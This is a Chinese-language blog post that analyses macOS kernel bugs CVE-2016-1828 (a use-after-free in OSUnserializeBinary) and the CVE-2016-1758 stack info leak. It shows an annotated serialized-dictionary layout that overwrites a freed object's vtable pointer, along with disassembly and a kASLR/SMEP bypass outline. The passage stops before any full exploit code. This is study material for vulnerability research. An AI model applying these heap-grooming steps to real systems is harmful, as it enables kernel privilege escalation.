<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"buffer0verflooow.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.21.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="CVE-2016-1828UAF 提权漏洞。 影响范围10.11.4 发现过程看内核代码时发现的 漏洞原理CVE-2016-1828：是OSUnserializeBinary函数中的一个UAF，通过给这个函数传递一个恶意的二进制blob，将导致该函数调用一个对象的虚函数，这个虚函数指针是被控制的。作者是利用这个漏洞实现了NULL指针解引用。 CVE-2016-1758：是 if_clone_lis">
<meta property="og:type" content="article">
<meta property="og:title" content="Apple 序列化漏洞">
<meta property="og:url" content="https://buffer0verflooow.github.io/2024/11/03/Apple%20%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="buffer0verflooow - Blog">
<meta property="og:description" content="CVE-2016-1828UAF 提权漏洞。 影响范围10.11.4 发现过程看内核代码时发现的 漏洞原理CVE-2016-1828：是OSUnserializeBinary函数中的一个UAF，通过给这个函数传递一个恶意的二进制blob，将导致该函数调用一个对象的虚函数，这个虚函数指针是被控制的。作者是利用这个漏洞实现了NULL指针解引用。 CVE-2016-1758：是 if_clone_lis">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-11-03T14:49:00.000Z">
<meta property="article:modified_time" content="2024-11-03T14:51:17.089Z">
<meta property="article:author" content="buffer0verflooow">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://buffer0verflooow.github.io/2024/11/03/Apple%20%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://buffer0verflooow.github.io/2024/11/03/Apple%20%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/","path":"2024/11/03/Apple 序列化漏洞/","title":"Apple 序列化漏洞"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Apple 序列化漏洞 | buffer0verflooow - Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">buffer0verflooow - Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/home/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#CVE-2016-1828"><span class="nav-number">1.</span> <span class="nav-text">CVE-2016-1828</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%BD%B1%E5%93%8D%E8%8C%83%E5%9B%B4"><span class="nav-number">1.1.</span> <span class="nav-text">影响范围</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%91%E7%8E%B0%E8%BF%87%E7%A8%8B"><span class="nav-number">1.2.</span> <span class="nav-text">发现过程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="nav-number">2.</span> <span class="nav-text">漏洞原理</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#OSUnserializeBinary"><span class="nav-number">2.1.</span> <span class="nav-text">OSUnserializeBinary</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#UAF"><span class="nav-number">2.2.</span> <span class="nav-text">UAF</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">3.</span> <span class="nav-text">漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#SMEP%E5%92%8CSMAP"><span class="nav-number">3.1.</span> <span class="nav-text">SMEP和SMAP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%86%85%E6%A0%B8%E9%9A%8F%E6%9C%BA%E5%9F%BA%E5%9D%80-kASLR"><span class="nav-number">3.2.</span> <span class="nav-text">内核随机基址(kASLR)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2-if-clone-list"><span class="nav-number">3.3.</span> <span class="nav-text">信息泄露 if_clone_list</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%84%E5%BB%BAROP"><span class="nav-number">3.4.</span> <span class="nav-text">构建ROP</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%97%AE%E9%A2%98"><span class="nav-number">4.</span> <span class="nav-text">问题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CVE-2021-30873"><span class="nav-number">5.</span> <span class="nav-text">CVE-2021-30873</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%BD%B1%E5%93%8D%E8%8C%83%E5%9B%B4-1"><span class="nav-number">5.1.</span> <span class="nav-text">影响范围</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-1"><span class="nav-number">5.2.</span> <span class="nav-text">漏洞原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Objective-C-serialization"><span class="nav-number">5.2.1.</span> <span class="nav-text">Objective-C serialization</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="nav-number">5.3.</span> <span class="nav-text">利用思路</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#NSRuleEditor"><span class="nav-number">5.3.1.</span> <span class="nav-text">NSRuleEditor</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#NSCustomImageRep"><span class="nav-number">5.3.2.</span> <span class="nav-text">NSCustomImageRep</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-1"><span class="nav-number">5.4.</span> <span class="nav-text">漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8"><span class="nav-number">5.4.1.</span> <span class="nav-text">沙箱逃逸</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="nav-number">5.4.2.</span> <span class="nav-text">权限提升</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SIP%E7%BB%95%E8%BF%87"><span class="nav-number">5.4.3.</span> <span class="nav-text">SIP绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%AE%E5%A4%8D"><span class="nav-number">5.5.</span> <span class="nav-text">修复</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">buffer0verflooow</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">56</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">51</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://buffer0verflooow.github.io/2024/11/03/Apple%20%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="buffer0verflooow">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="buffer0verflooow - Blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Apple 序列化漏洞 | buffer0verflooow - Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Apple 序列化漏洞
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>
      

      <time title="Created: 2024-11-03 22:49:00 / Modified: 22:51:17" itemprop="dateCreated datePublished" datetime="2024-11-03T22:49:00+08:00">2024-11-03</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="CVE-2016-1828"><a href="#CVE-2016-1828" class="headerlink" title="CVE-2016-1828"></a>CVE-2016-1828</h1><p>UAF 提权漏洞。</p>
<h2 id="影响范围"><a href="#影响范围" class="headerlink" title="影响范围"></a>影响范围</h2><p>10.11.4</p>
<h2 id="发现过程"><a href="#发现过程" class="headerlink" title="发现过程"></a>发现过程</h2><p>看内核代码时发现的</p>
<h1 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h1><p><a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1828">CVE-2016-1828</a>：<code>是OSUnserializeBinary</code>函数中的一个UAF，通过给这个函数传递一个恶意的二进制blob，将导致该函数调用一个对象的虚函数，这个虚函数指针是被控制的。作者是利用这个漏洞实现了NULL指针解引用。</p>
<p><a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1758">CVE-2016-1758</a>：是 <code>if_clone_list</code>函数中的一个内核栈信息泄露，一个8字节的未初始化的内核栈信息被复制到用户空间中。这些字节可以在触发漏洞之前，通过syscall调用初始化为内核text地址。获取到泄漏的text指针后，通过减掉已知的text地址，可以计算出kernel slide。</p>
<h2 id="OSUnserializeBinary"><a href="#OSUnserializeBinary" class="headerlink" title="OSUnserializeBinary"></a><code>OSUnserializeBinary</code></h2><p>当用户空间与内核空间，需要传递一些数据，如字符串、数组、字典等。Libkern 通过定义容器和集合类，与传递给用户空间 API 的 CoreFoundation 对象相对应，使数据交换变得简单。这些类都继承自OSObject，在下面的表格中列出。</p>
<table>
<thead>
<tr>
<th>XML tag</th>
<th>CoreFoundation class</th>
<th>Libkern class</th>
<th>Contents</th>
</tr>
</thead>
<tbody><tr>
<td><code>true</code> or <code>false</code></td>
<td><code>CFBoolean</code></td>
<td><code>OSBoolean</code></td>
<td>Boolean <code>true</code> or <code>false</code></td>
</tr>
<tr>
<td><code>data</code></td>
<td><code>CFData</code></td>
<td><code>OSData</code></td>
<td>Array of bytes</td>
</tr>
<tr>
<td><code>integer</code></td>
<td><code>CFNumber</code></td>
<td><code>OSNumber</code></td>
<td>Integer value</td>
</tr>
<tr>
<td><code>string</code></td>
<td><code>CFString</code></td>
<td><code>OSString</code></td>
<td>Array of characters</td>
</tr>
<tr>
<td></td>
<td></td>
<td><code>OSSymbol</code></td>
<td>Reference to unique string</td>
</tr>
<tr>
<td><code>array</code></td>
<td><code>CFArray</code></td>
<td><code>OSArray</code></td>
<td>Array of objects</td>
</tr>
<tr>
<td><code>dict</code></td>
<td><code>CFDictionary</code></td>
<td><code>OSDictionary</code></td>
<td>Map of strings to objects</td>
</tr>
<tr>
<td><code>set</code></td>
<td><code>CFSet</code></td>
<td><code>OSSet</code></td>
<td>Set of unique objects</td>
</tr>
</tbody></table>
<p>当一个CoreFoundation对象传递给内核空间时，首先通过 <code>IOCFSerialize</code>转化为二进制或XML形式。序列化的数据被传递进内核，并通过 <code>OSUnserializeXML</code>进行反序列化。如果数据是二进制的，<code>OSUnserializeXML</code>将调用 <code>OSUnserializeBinary </code>函数。</p>
<p><a target="_blank" rel="noopener" href="http://opensource.apple.com/source/xnu/xnu-3248.20.55/libkern/c++/OSSerializeBinary.cpp">OSUnserializeBinary</a>函数尝试解码和重建数据。通常，反序列化的对象包含若干个entry。当一个对象在数据中被包含了几次，为了减小序列化后的大小，二进制序列化方式支持通过下标引用之前的序列化对象。因此，反序列化的逻辑是将重建的对象被存储在一个数组中，方便后续通过下标进行引用。</p>
<p>大概是出于效率考虑，这个数组并不是像OSArray一样进行自动管理，取而代之的是，<code>OSUnserializeBinary</code>手动管理一个动态分配的OSObject数组指针。当一个新的对象被反序列化后，它被添加到 <code>objsArray</code>数组的末尾，而没有增加它的引用计数。这应该是安全的，因为每一个生成的对象被存储在其父节点中，父节点增加其引用以使其保持存活。</p>
<p>当一个节点在反序列化过程中，被通过下标进行引用时，对象指针将在objsArray中进行查找，存储在变量o中：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> kOSSerializeObject:</span><br><span class="line">    <span class="keyword">if</span> (len &gt;= objsIdx) <span class="keyword">break</span>;</span><br><span class="line">    o = objsArray[len];</span><br><span class="line">    o-&gt;retain();</span><br><span class="line">    isRef = <span class="literal">true</span>;</span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>

<p>o在被插入到父集合中后就会删除：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (o != dict) ok = dict-&gt;setObject(sym, o);</span><br><span class="line">o-&gt;release();</span><br><span class="line">sym-&gt;release();</span><br><span class="line">sym = <span class="number">0</span>;</span><br></pre></td></tr></table></figure>

<h2 id="UAF"><a href="#UAF" class="headerlink" title="UAF"></a>UAF</h2><p>可惜的是，这种想法其实不一定很安全，因为存储的对象在反序列化的过程中可能被释放，成了一个悬空指针。</p>
<p>对于一个序列化的字典，其中的键可能被赋值好几次：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dict</span>&gt;</span>                          <span class="comment">&lt;!--  object 0  --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">key</span>&gt;</span>a<span class="tag">&lt;/<span class="name">key</span>&gt;</span>                <span class="comment">&lt;!--  object 1  --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">string</span>&gt;</span>foo<span class="tag">&lt;/<span class="name">string</span>&gt;</span>        <span class="comment">&lt;!--  object 2  --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">key</span>&gt;</span>a<span class="tag">&lt;/<span class="name">key</span>&gt;</span>                <span class="comment">&lt;!--  object 3  --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">string</span>&gt;</span>bar<span class="tag">&lt;/<span class="name">string</span>&gt;</span>        <span class="comment">&lt;!--  object 4  --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">key</span>&gt;</span>b<span class="tag">&lt;/<span class="name">key</span>&gt;</span>                <span class="comment">&lt;!--  object 5  --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">object</span>&gt;</span>2<span class="tag">&lt;/<span class="name">object</span>&gt;</span>          <span class="comment">&lt;!--  object 6  --&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dict</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>当bar被反序列化出来时，它会去替换foo，foo的引用计数就要被释放一个，这将导致在 <code>objsArray[2]</code>处出现一个悬空指针。</p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><p>控制已释放的内存中的内容，通过我们控制的虚指针调用retain函数。</p>
<ul>
<li>我们可以控制在序列化的过程中，对象何时分配、何时释放；</li>
<li>我们可以控制内存中的内容，通过在字典中添加一个OSData对象。</li>
</ul>
<p>要想控制对象的虚指针，我们需要确保已释放的对象内存被用来分配OSData对象数据缓冲区，而不是OSData对象本身。但是，OSData对象在它的数据缓冲区之前被分配，所以，我们将创建两个OSData对象，第一个被用来重新分配OSData对象，第二个则包含假的虚指针。</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dict</span>&gt;</span>                              <span class="comment">&lt;!--   0: dict                                    --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">key</span>&gt;</span>a<span class="tag">&lt;/<span class="name">key</span>&gt;</span>                    <span class="comment">&lt;!--   1: key &quot;a&quot;                                 --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">integer</span>&gt;</span>10<span class="tag">&lt;/<span class="name">integer</span>&gt;</span>           <span class="comment">&lt;!--   2: allocate block1                         --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">key</span>&gt;</span>b<span class="tag">&lt;/<span class="name">key</span>&gt;</span>                    <span class="comment">&lt;!--   3: key &quot;b&quot;                                 --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">integer</span>&gt;</span>20<span class="tag">&lt;/<span class="name">integer</span>&gt;</span>           <span class="comment">&lt;!--   4: allocate block2                         --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">key</span>&gt;</span>a<span class="tag">&lt;/<span class="name">key</span>&gt;</span>                    <span class="comment">&lt;!--   5: key &quot;a&quot;                                 --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">true</span>/&gt;</span>                         <span class="comment">&lt;!--   6: free block1; free list: block1          --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">key</span>&gt;</span>b<span class="tag">&lt;/<span class="name">key</span>&gt;</span>                    <span class="comment">&lt;!--   7: key &quot;b&quot;                                 --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">true</span>/&gt;</span>                         <span class="comment">&lt;!--   8: free block2; free list: block2, block1  --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">key</span>&gt;</span>a<span class="tag">&lt;/<span class="name">key</span>&gt;</span>                    <span class="comment">&lt;!--   9: key &quot;a&quot;                                 --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">data</span>&gt;</span> vtable pointer <span class="tag">&lt;/<span class="name">data</span>&gt;</span>   <span class="comment">&lt;!--  10: OSData gets block2, data gets block1    --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">key</span>&gt;</span>b<span class="tag">&lt;/<span class="name">key</span>&gt;</span>                    <span class="comment">&lt;!--  11: key &quot;b&quot;                                 --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">object</span>&gt;</span>2<span class="tag">&lt;/<span class="name">object</span>&gt;</span>              <span class="comment">&lt;!--  12: block1-&gt;retain()                        --&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dict</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>a和b均为 <code>OSNumber</code>类型，因为在64位系统上，其 <code>OSNumber</code>的大小和 <code>OSData</code>接近，可以共享一个freelist。然后将aheb赋值为true，将触发释放 <code>OSNumber</code>。在这种情况下，b的 <code>OSNumber</code>在free list的头部，a的 <code>OSNumber</code>紧接其后。通过插入一个OSData对象，可以导致，OSData的容器使用b的 <code>OSNumber</code>，OSData的数据缓冲区使用a的 <code>OSNumber</code>。通过下标引用a的OSNumber将导致在已释放的 <code>OSNumber</code>对象上调用retain函数，该虚函数指针已被覆盖为我们控制的地址，从而导致代码执行。</p>
<p>反汇编看看retain函数调用附近的虚表布局：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">ffffff800088016a        cmp    eax, 0xc000000                   ;; case kOSSerializeObject</span><br><span class="line">ffffff800088016f        jne    0xffffff8000880819</span><br><span class="line">ffffff8000880175        mov    qword ptr [rbp - 0x40], rdi</span><br><span class="line">ffffff8000880179        mov    rax, qword ptr [rbp - 0x58]</span><br><span class="line">ffffff800088017d        cmp    r12d, eax                        ;;   if (len &gt;= objsIdx) break;</span><br><span class="line">ffffff8000880180        jae    0xffffff8000880819</span><br><span class="line">ffffff8000880186        mov    dword ptr [rbp - 0x4c], edx</span><br><span class="line">ffffff8000880189        mov    eax, r12d</span><br><span class="line">ffffff800088018c        mov    rcx, qword ptr [rbp - 0x60]</span><br><span class="line">ffffff8000880190        mov    r14, qword ptr [rcx + 8*rax]     ;;   o = objsArray[len]</span><br><span class="line">ffffff8000880194        mov    rax, qword ptr [r14]</span><br><span class="line">ffffff8000880197        mov    rdi, r14</span><br><span class="line">ffffff800088019a        call   qword ptr [rax + 0x20]           ;;   o-&gt;retain()</span><br></pre></td></tr></table></figure>

<p>从 <code>ffffff8000880194</code>的r14（变量o）中读出8个字节给rax，rax是虚指针。下面，<code>rax + 0x20</code>被调用，此时rip在虚指针偏移4处，rax指向虚指针的起始位置。</p>
<h2 id="SMEP和SMAP"><a href="#SMEP和SMAP" class="headerlink" title="SMEP和SMAP"></a>SMEP和SMAP</h2><ul>
<li>SMEP将导致CPU产生一个页错误，当内核试图在用户空间执行代码时。<ul>
<li>使用内核ROP进行绕过。</li>
</ul>
</li>
<li>SMAP拓展了SMEP，当内核试图访问用户空间内存时就会产生页错误。<ul>
<li>SMAP在Intel处理器的Broadwell中引入，绕过需要完全的内核ROP和虚指针。</li>
</ul>
</li>
</ul>
<h2 id="内核随机基址-kASLR"><a href="#内核随机基址-kASLR" class="headerlink" title="内核随机基址(kASLR)"></a>内核随机基址(kASLR)</h2><p>内核文件在 <code>/System/Library/Kernels/kernel</code> 中。</p>
<h2 id="信息泄露-if-clone-list"><a href="#信息泄露-if-clone-list" class="headerlink" title="信息泄露 if_clone_list"></a>信息泄露 <code>if_clone_list</code></h2><p>代码如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">int</span></span><br><span class="line"><span class="title function_">if_clone_list</span><span class="params">(<span class="type">int</span> count, <span class="type">int</span> *ret_total, <span class="type">user_addr_t</span> dst)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">char</span> outbuf[IFNAMSIZ];</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">if_clone</span> *<span class="title">ifc</span>;</span></span><br><span class="line">    <span class="type">int</span> error = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    *ret_total = if_cloners_count;</span><br><span class="line">    <span class="keyword">if</span> (dst == USER_ADDR_NULL) &#123;</span><br><span class="line">        <span class="comment">/* Just asking how many there are. */</span></span><br><span class="line">        <span class="keyword">return</span> (<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (count &lt; <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">return</span> (EINVAL);</span><br><span class="line"></span><br><span class="line">    count = (if_cloners_count &lt; count) ? if_cloners_count : count;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (ifc = LIST_FIRST(&amp;if_cloners); ifc != <span class="literal">NULL</span> &amp;&amp; count != <span class="number">0</span>;</span><br><span class="line">         ifc = LIST_NEXT(ifc, ifc_list), count--, dst += IFNAMSIZ) &#123;</span><br><span class="line">        strlcpy(outbuf, ifc-&gt;ifc_name, IFNAMSIZ);</span><br><span class="line">        error = copyout(outbuf, dst, IFNAMSIZ);</span><br><span class="line">        <span class="keyword">if</span> (error)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> (error);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个函数用于将network interface cloner的名称拷贝到用户空间中。<code>ifc_name</code>比outbuf小时，outbuf中会留下一些字节没有被赋值，或者说是未初始化。但是copyout会将整个outbuf都拷贝到用户空间，也就是说包含未初始化的字节。</p>
<p>IFNAMSIZ被定义为16，一般来讲，很难保证留出8字节的未初始化空间，但是，很巧的是，第一个interface cloner是bridge，将留出9个字节。</p>
<p>看源码，找调用栈：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">soo_ioctl</span><br><span class="line">  soioctl</span><br><span class="line">    ifioctllocked</span><br><span class="line">      ifioctl</span><br><span class="line">        ifioctl_ifclone</span><br><span class="line">          if_clone_list</span><br></pre></td></tr></table></figure>

<p>soo_ioctl的定义在<a target="_blank" rel="noopener" href="http://www.opensource.apple.com/source/xnu/xnu-3248.20.55/bsd/kern/sys_socket.c"><code>socketops</code></a>中：</p>
